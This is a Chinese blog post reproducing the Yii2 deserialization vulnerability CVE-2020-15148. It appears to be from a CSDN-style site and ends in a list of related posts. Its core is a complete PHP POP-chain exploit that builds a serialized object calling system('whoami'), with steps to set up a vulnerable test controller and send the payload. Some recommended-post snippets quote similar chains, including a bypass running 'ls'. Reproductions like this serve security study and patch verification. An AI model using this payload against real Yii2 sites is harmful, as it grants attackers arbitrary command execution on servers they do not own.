gctf 2017 php 序列化,Yii2反序列化(CVE-2020-15148)复现

最新推荐文章于 2023-03-30 17:14:01 发布
最新推荐文章于 2023-03-30 17:14:01 发布
阅读量157 收藏
点赞数
文章标签: gctf 2017 php 序列化

为了方便安装,直接在github(https://github.com/yiisoft/yii2)下载一个release的低版本,然后解压tgz文件到phpstudy的www的目录下,命名为Yii2:

需要注意的是,php拓展需要勾选openssl,然后再执行php init安装Yii2,否则会报错,安装完成后访问一下,证明就安装成功了:

POC:

namespace yii\db;

class BatchQueryResult extends \yii\base\BaseObject{

private $_dataReader;

public function __construct()

{

$this->_dataReader=new \Faker\Generator();

}

}

namespace yii\base;

class BaseObject{

}

namespace yii\rest;

class Action{

public $checkAccess='system';

public $id='whoami';

}

class IndexAction extends Action{

}

namespace Faker;

class Generator{

protected $formatters = array();

public function __construct()

{

$this->formatters['close']=[(new \yii\rest\IndexAction()),"run"];

}

}

use \yii\db\BatchQueryResult;

$c=new BatchQueryResult();

print(serialize($c));

pop链师傅们已经分析好了,还需要自己构造一个反序列化的入口,在controllers下新建一个TestController.php:

先测试下:

然后发送payload:

参考链接:

https://mp.weixin.qq.com/s/NHBpF446yKQbRTiNQr8ztA

一只流氓飘呀飘
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Yii2框架 反序列化漏洞复现(CVE-2020-15148)
snowlyzz的博客
10-25 1745
yii2框架 反序列化漏洞复现
[PHP代码审计][CVE-2020-15148]Yii2<2.0.38反序列化命令执行
Y4tacker的博客
05-23 1688
文章目录写在前面POP链1POP链2分析 写在前面 最近倒是不知道干些啥,有点迷茫的状态,不过每天都保持学习就好了,今天空下来了准备写一篇刚学的POP链分析 POP链1 <?php namespace yii\db; class BatchQueryResult extends \yii\base\BaseObject{ private $_dataReader; public function __construct() { $this->_dataRe
php探针入侵,【防护方案】Yii2 反序列化远程命令执行漏洞 (CVE-2020-15148)
weixin_36012511的博客
03-28 799
一、综述近日监测到,Yii Framework 2 在其 9月14 日发布的更新日志中公布了一个反序列化远程命令执行漏洞(CVE-2020-15148)。官方通过给yii\db\BatchQueryResult类加上__wakeup()函数,禁用了yii\db\BatchQueryResult的反序列化,阻止了应用程序对任意用户输入调用’unserialize()’造成的远程命令执行。Yii2 是...
CVE-2020-15148 Yii反序列化漏洞复现
绮洛Ki1ro的博客
08-05 852
CVE-2020-15148 Yii反序列化漏洞复现
CVE-2020-15148--Yii2 反序列化漏洞复现
Monica的博客
09-26 1087
简介: YiiFramework是一个基于组件、用于开发大型Web应用的高性能 PHP 框架。Yii提供了今日Web 2.0应用开发所需要的几乎一切功能。Yii是最有效率的PHP框架之一。 Yii2 2.0.38 之前的版本存在反序列化漏洞,程序在调用unserialize 时,攻击者可通过构造特定的恶意请求执行任意命令。 环境部署: 下载地址: https://github.com/yiisoft/yii2/releases/tag/2.0.37 下载这个yii..
GCTF-Gautomatch-Cu10.1.tar.gz
06-14
标题中的"GCTF-Gautomatch-Cu10.1.tar.gz"是一个软件包,它包含了GCTF(Global Contrast Transfer Function)的自动化匹配工具Cu10.1版本。这个工具主要用于冷冻电镜(Cryo-Electron Microscopy,简称cryo-EM)的数据...
Gradient-Centralization-TensorFlow:实现Gradient Centralization并允许其在TensorFlow中用作Python包
03-04
梯度集中TensorFlow 这个Python套件在TensorFlow中实现了梯度集中,这是Yong等人建议的一种简单有效的针对深度神经网络的优化技术。... get_gradients = gctf . centralized_gradients_for_optimize
gctf19
03-11
【标题】"gctf19" 指的可能是某个网络安全竞赛或挑战中的一个特定题目,其中涉及到了JavaScript技术的应用。"gctf"通常代表网络安全相关的Capture The Flag(夺旗赛)活动,这类比赛中,参赛者需要解决一系列安全...
自动控制系统的稳定性和稳态误差分析.doc
10-10
可以利用 MATLAB 中的 tf2zp 函数求出系统的零极点,或者利用 root 函数求分母多项式的根来确定系统的闭环极点,从而判断系统的稳定性。 在 MATLAB 命令窗口写入程序代码如下: z=-2.5 p=[0,-0.5,-0.7,-3] k=0.2 ...
蛋白软件安装:并行环境openmpi、relion GPU版(fftw、fltk)、coot、pymol、Gautomatch等
04-13
5. **Coot**、**PyMOL** 和其他软件如 **Gautomatch**、**Gctf**、**frealign**、**bsoft**、**ctffind**、**DoGpicker**、**Resmap**、**MotionCor2**、**MotionCorr**、**eman2.2**、**spider**、**chimera** 是一...
CVE-2020-15148-bypasses:几条关于CVE-2020-15148yii2反序列化)的绕过
03-09
CVE-2020-15148绕过 几条关于CVE-2020-15148yii2反序列化)的绕过 poc1 这一个是在2.0.37版本可利用的,2.0.38恢复了这,也就是这个被分配了CVE-2020-15148,后面的三个是绕过 <?php namespace yii\rest{ class CreateAction{ public $checkAccess; public $id; public function __construct(){ $this->checkAccess = 'system'; $this->id = 'ls'; } } } namespace Faker{ use yii\rest\CreateAction; cla
CVE-2020-11890:CVE-2020-11890
03-10
香港制造 CVE-2020-11890:用户组表类中的输入验证不正确可能会导致RCE的ACL配置损坏 关联 PoC 受影响的版本:3.9.17之前的Joomla核心 用户要求:管理员帐户(非超级管理员) 获得访问权限:创建一个新的超级管理员,然后触发RCE。 Joomla中的远程代码执行(RCE) 使用您的凭据运行cve202011890.py并访问链接rce: 使用docker的指南,例如: #步骤1: docker pull hoangkien1020 / joomla:3.9.16 #第2步: 码头工人运行-d --rm -it -p 8080:80 hoangkien1020 / joomla:3.9.16 #Step 3:通过端口8080访问您的域/ IP: 带有凭据的此图像内 用户名密码 MySQL:root:root(可以通过IP:8080 / phpmyadmin访问) s
【网络安全】浅谈CVE-2020-15148漏洞
m0_71746299的博客
03-30 397
今天给大家带来的是CVE-2020-15148漏洞的简单分析,整体看下来还是很简单的,我们需要注意如何调用的魔术方法以及如何进行RCE,有兴趣的小伙伴可以自己去搭建环境进行测试,喜欢本文的朋友希望可以一键三连支持一下。
CVE-2020-15148复现
your_friends的博客
11-09 894
这几天进行了反序列化的学习,看到了yii反序列化,拿过来学习一下
[CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148)
Landasika的博客
05-17 1301
目录 [CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148)一、什么是YiiYii 是什么YiiYii 最适合做什么?二、漏洞分析三、漏洞pocyii 2.0.37 以前yii 2.0.37 以后四、WEB_267 [CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148) 一、什么是Yii 参考官网 https://ww...
Yii2 反序列化漏洞(CVE-2020-15148)复现
锋刃科技的博客
12-16 9322
漏洞概述 Yii是一套基于组件、用于开发大型Web应用的高性能PHP框架。Yii2 2.0.38 之前的版本存在反序列化漏洞,程序在调用unserialize 时,攻击者可通过构造特定的恶意请求执行任意命令。 环境搭建 到github上下载yii2的2.0.37版本 https://github.com/yiisoft/yii2/releases/tag/2.0.37 然后修改/config/web.php文件17行cookieValidationKey,可以随便定义 ...
bugku-writeup-Reverse-mobile2(gctf)
dark的博客
07-08 441
题目:mobile2(gctf) 工具:010 editor 01—010 editor查看 查看xml文件,得到flag。
yii2框架 反序列化漏洞复现
feng的博客
02-16 3728
前言 最近学习PHP反序列化的时候遇到了yii2反序列化的利用,就顺便搭了一下环境,跟着网上各种大师傅们的文章进行了一波复现和学习,提高自己代码审计的能力。 漏洞出现在yii2.0.38之前的版本中,在2.0.38进行了修复,CVE编号是CVE-2020-15148: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls unserialize()
yii2反序列化漏洞总结
unexpectedthing的博客
03-29 4635
文章目录yii2框架 反序列化漏洞复现yii 框架搭建过程CVE-2020-15148复现链子2链子3链子4链子5链子6参考链接 yii2框架 反序列化漏洞复现 yii 框架 Yii 是一个适用于开发 Web2.0 应用程序的高性能PHP 框架。 Yii 是一个通用的 Web 编程框架,即可以用于开发各种用 PHP 构建的 Web 应用。 因为基于组件的框架结构和设计精巧的缓存支持,它特别适合开发大型应用, 如门户网站、社区、内容管理系统(CMS)、 电子商务项目和 RESTful Web 服务等。 Yii
工作述职报告PPT模板 (25)
最新发布
07-12
【作品名称】:工作述职报告PPT模板 (25) 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值